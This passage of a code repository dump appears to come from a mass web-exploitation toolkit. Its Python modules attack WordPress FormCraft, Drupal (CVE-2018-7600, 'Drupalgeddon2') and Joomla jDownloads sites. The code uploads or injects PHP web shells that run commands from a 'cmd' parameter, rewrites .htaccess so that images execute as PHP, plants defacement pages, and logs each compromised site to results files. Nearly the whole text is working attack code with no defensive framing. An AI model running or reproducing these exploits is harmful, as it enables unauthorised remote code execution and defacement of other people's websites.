86 |                 with open('result/pwd_WordpressSites.txt', 'a') as X:
87 |                     X.write(url + '  ' + Path_Host + '\n')
88 |     except:
89 |         pass
90 | 
91 | 


--------------------------------------------------------------------------------
/Exploits/formcraft.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, re
 3 | from Exploits import printModule
 4 | 
 5 | pagelinesExploitShell = 'files/settings_auto.php'
 6 | Jce_Deface_image = 'files/pwn.gif'
 7 | Headers = {
 8 |     'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
 9 | }
10 | 
11 | 
12 | 
13 | def Exploit(site):
14 |     try:
15 |         ShellFile = {'files[]': open(pagelinesExploitShell, 'rb')}
16 |         Exp = 'http://' + site + '/wp-content/plugins/formcraft/file-upload/server/content/upload.php'
17 |         Check = requests.get(Exp, timeout=10, headers=Headers)
18 |         if '"failed"' in str(Check.content):
19 |             GoT = requests.post(Exp, files=ShellFile, timeout=10, headers=Headers)
20 |             if 'new_name' in str(GoT.content):
21 |                 GetIndexName = re.findall('"new_name":"(.*)",', str(GoT.content))
22 |                 IndexPath = site + '/wp-content/plugins/formcraft/file-upload/server/content/files/' \
23 |                             + GetIndexName[0].split('"')[0]
24 |                 CheckIndex = requests.get('http://' + IndexPath, timeout=10, headers=Headers)
25 |                 if CheckIndex.status_code == 200:
26 |                     CheckShell = requests.get('http://' + site + '/wp-content/neko.php',
27 |                                               timeout=10, headers=Headers)
28 |                     CheckIndex = requests.get('http://' + site + '/neko.htm', timeout=10, headers=Headers)
29 |                     if 'neko!!' in str(CheckShell.content):
30 |                         with open('result/Shell_results.txt', 'a') as writer:
31 |                             writer.write(site + '/wp-content/neko.php' + '\n')
32 |                         if 'neko!!' in str(CheckIndex.content):
33 |                             with open('result/Index_results.txt', 'a') as writer:
34 |                                 writer.write(site + '/neko.htm' + '\n')
35 |                         return printModule.returnYes(site, 'N/A', 'Wordpress Formcraft', 'Wordpress')
36 |                     else:
37 |                         return formcraftExploitIndeX(site)
38 |                 else:
39 |                     return formcraftExploitIndeX(site)
40 |             else:
41 |                 return formcraftExploitIndeX(site)
42 |         else:
43 |             return formcraftExploitIndeX(site)
44 |     except:
45 |         return formcraftExploitIndeX(site)
46 | 
47 | 
48 | def formcraftExploitIndeX(site):
49 |     try:
50 |         ShellFile = {'files[]': open(Jce_Deface_image, 'rb')}
51 |         Exp = 'http://' + site + '/wp-content/plugins/formcraft/file-upload/server/content/upload.php'
52 |         Check = requests.get(Exp, timeout=10, headers=Headers)
53 |         if '"failed"' in str(Check.content):
54 |             GoT = requests.post(Exp, files=ShellFile, timeout=10, headers=Headers)
55 |             if 'new_name' in str(GoT.content):
56 |                 GetIndexName = re.findall('"new_name":"(.*)",', str(GoT.content))
57 |                 IndexPath = site + '/wp-content/plugins/formcraft/file-upload/server/content/files/' \
58 |                             + GetIndexName[0].split('"')[0]
59 |                 CheckIndex = requests.get('http://' + IndexPath, timeout=10, headers=Headers)
60 |                 if 'GIF89a' in str(CheckIndex.content):
61 |                     with open('result/Index_results.txt', 'a') as writer:
62 |                         writer.write(IndexPath + '\n')
63 |                     return printModule.returnYes(site, 'N/A', 'Wordpress Formcraft', 'Wordpress')
64 |                 else:
65 |                     return printModule.returnNo(site, 'N/A', 'Wordpress Formcraft', 'Wordpress')
66 |             else:
67 |                 return printModule.returnNo(site, 'N/A', 'Wordpress Formcraft', 'Wordpress')
68 |         else:
69 |             return printModule.returnNo(site, 'N/A', 'Wordpress Formcraft', 'Wordpress')
70 |     except:
71 |         return printModule.returnNo(site, 'N/A', 'Wordpress Formcraft', 'Wordpress')
72 | 


--------------------------------------------------------------------------------
/Exploits/CVE_2018_7600Drupalgeddon2.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, re
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | 
14 | 
15 | def Exploit(site):
16 |     try:
17 |         payloadshell = "neko!!<?php {}({}['{}']);?>".format('system', '$_GET', 'cmd')
18 |         PrivatePAyLoad = "echo 'neko!!' > neko.htm;" \
19 |                          " echo '" + payloadshell + "'> sites/default/files/neko.php;" \
20 |                                                     " echo '" + payloadshell + "'> neko.php;" \
21 |                                                                                " cd sites/default/files/;" \
22 |                                                                                " echo 'AddType application/x-httpd-php .jpg' > .htaccess;" \
23 |                                                                                " echo '" + payloadshell + "'> up.php;"
24 |         get_params = {'q': 'user/password', 'name[#post_render][]': 'passthru',
25 |                       'name[#markup]': PrivatePAyLoad, 'name[#type]': 'markup'}
26 |         post_params = {'form_id': 'user_pass', '_triggering_element_name': 'name'}
27 | 
28 |         r = requests.post('http://' + site, data=post_params, params=get_params, headers=Headers)
29 |         m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.content)
30 |         if m:
31 |             found = m.group(1)
32 |             get_params = {'q': 'file/ajax/name/#value/' + found}
33 |             post_params = {'form_build_id': found}
34 |             requests.post('http://' + site, data=post_params, params=get_params, headers=Headers)
35 |             a = requests.get('http://' + site + '/sites/default/files/neko.php',
36 |                              timeout=10, headers=Headers)
37 |             if 'neko!!' in str(a.content):
38 |                 with open('result/Shell_results.txt', 'a') as writer:
39 |                     writer.write(site + '/sites/default/files/neko.php?cmd=id' + '\n')
40 |                 gg = requests.get('http://' + site + '/neko.htm', timeout=10, headers=Headers)
41 |                 CheckUploader = requests.get('http://' + site + '/sites/default/files/up.php',
42 |                                              timeout=10, headers=Headers)
43 |                 if 'neko!!' in str(CheckUploader.content):
44 |                     with open('result/Shell_results.txt', 'a') as writer:
45 |                         writer.write(site + '/sites/default/files/up.php?cmd=pwd' + '\n')
46 |                 if 'neko!!' in str(gg.content):
47 |                     with open('result/Index_results.txt', 'a') as writer:
48 |                         writer.write(site + '/neko.htm' + '\n')
49 |                 return printModule.returnYes(site, 'CVE-2018-7600', 'Drupal7 core Geddon2', 'Drupal')
50 |             else:
51 |                 gg = requests.get('http://' + site + '/neko.htm', timeout=10, headers=Headers)
52 |                 if 'neko!!' in str(gg.content):
53 |                     with open('result/Index_results.txt', 'a') as writer:
54 |                         writer.write(site + '/neko.htm' + '\n')
55 |                     Checkshell = requests.get('http://' + site + '/neko.php', timeout=10, headers=Headers)
56 |                     if 'neko!!' in str(Checkshell.content):
57 |                         with open('result/Shell_results.txt', 'a') as writer:
58 |                             writer.write(site + '/neko.php?cmd=id' + '\n')
59 |                     return printModule.returnYes(site, 'CVE-2018-7600', 'Drupal7 core Geddon2', 'Drupal')
60 |                 else:
61 |                     return printModule.returnNo(site, 'CVE-2018-7600', 'Drupal7 core Geddon2', 'Drupal')
62 |         else:
63 |             return printModule.returnNo(site, 'CVE-2018-7600', 'Drupal7 core Geddon2', 'Drupal')
64 |     except:
65 |         return printModule.returnNo(site, 'CVE-2018-7600', 'Drupal7 core Geddon2', 'Drupal')
66 | 


--------------------------------------------------------------------------------
/Exploits/com_jdownloads.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | ZipJd = 'files/jdownlods.zip'
14 | jdShell = 'files/neko.php3.j'
15 | Jce_Deface_image = 'files/pwn.gif'
16 | 
17 | 
18 | def Exploit(site):
19 |     try:
20 |         fileindex = {'file_upload': (ZipJd, open(ZipJd, 'rb'), 'multipart/form-data'),
21 |                      'pic_upload': (jdShell, open(jdShell, 'rb'), 'multipart/form-data')}
22 |         post_data = {
23 |             'name': 'Senpai',
24 |             'mail': 'senpai@tegalsec.org',
25 |             'catlist': '1',
26 |             'filetitle': "lolz",
27 |             'description': "<p>zot</p>",
28 |             '2d1a8f3bd0b5cf542e9312d74fc9766f': 1,
29 |             'send': 1,
30 |             'senden': "Send file",
31 |             'description': "<p>qsdqsdqsdqsdqsdqsdqsd</p>",
32 |             'option': "com_jdownloads",
33 |             'view': "upload"
34 |         }
35 |         Exp = 'http://' + site + '/index.php?option=com_jdownloads&Itemid=0&view=upload'
36 |         Got = requests.post(Exp, files=fileindex, data=post_data, timeout=10, headers=Headers)
37 |         if '/upload_ok.png' in str(Got.content):
38 |             checkUrl = 'http://' + site + '/images/jdownloads/screenshots/' + jdShell.split('/')[1]
39 |             Check = requests.get(checkUrl, timeout=10, headers=Headers)
40 |             if 'neko!!' in str(Check.content):
41 |                 ChecksHell = requests.get('http://' + site + '/images/neko.php', timeout=10, headers=Headers)
42 |                 CheckIndex = requests.get('http://' + site + '/neko.htm', timeout=10, headers=Headers)
43 |                 if 'neko!!' in str(ChecksHell.content):
44 |                     with open('result/Shell_results.txt', 'a') as writer:
45 |                         writer.write(site + '/images/neko.php' + '\n')
46 |                 if 'neko!!' in str(CheckIndex.content):
47 |                     with open('result/Index_results.txt', 'a') as writer:
48 |                         writer.write(site + '/neko.htm' + '\n')
49 |                     return printModule.returnYes(site, 'N/A', 'Com_Jdownloads', 'Joomla')
50 |                 else:
51 |                     return Com_Jdownloads(site)
52 |             else:
53 |                 return Com_Jdownloads(site)
54 |         else:
55 |             return Com_Jdownloads(site)
56 |     except:
57 |         return Com_Jdownloads(site)
58 | 
59 | 
60 | def Com_Jdownloads(site):
61 |     try:
62 |         fileindex = {'file_upload': (ZipJd, open(ZipJd, 'rb'), 'multipart/form-data'),
63 |                      'pic_upload': (Jce_Deface_image, open(Jce_Deface_image, 'rb'), 'multipart/form-data')}
64 |         post_data = {
65 |             'name': 'ur name',
66 |             'mail': 'TTTnstT@aa.com',
67 |             'catlist': '1',
68 |             'filetitle': "lolz",
69 |             'description': "<p>zot</p>",
70 |             '2d1a8f3bd0b5cf542e9312d74fc9766f': 1,
71 |             'send': 1,
72 |             'senden': "Send file",
73 |             'description': "<p>qsdqsdqsdqsdqsdqsdqsd</p>",
74 |             'option': "com_jdownloads",
75 |             'view': "upload"
76 |         }
77 |         Exp = 'http://' + site + '/index.php?option=com_jdownloads&Itemid=0&view=upload'
78 |         Got = requests.post(Exp, files=fileindex, data=post_data, timeout=10, headers=Headers)
79 |         if '/upload_ok.png' in str(Got.content):
80 |             checkUrl = 'http://' + site + '/images/jdownloads/screenshots/' + Jce_Deface_image.split('/')[1]
81 |             Check = requests.get(checkUrl, timeout=10, headers=Headers)
82 |             if 'GIF89a' in str(Check.content):
83 |                 with open('result/Index_results.txt', 'a') as writer:
84 |                     writer.write(checkUrl + '\n')
85 |                 return printModule.returnYes(site, 'N/A', 'Com_Jdownloads', 'Joomla')
86 |             else:
87 |                 return printModule.returnNo(site, 'N/A', 'Com_Jdownloads', 'Joomla')
88 |         else:
89 |             return printModule.returnNo(site, 'N/A', 'Com_Jdownloads', 'Joomla')
90 |     except:
91 |         return printModule.returnNo(site, 'N/A', 'Com_Jdownloads', 'Joomla')
92 | 


--------------------------------------------------------------------------------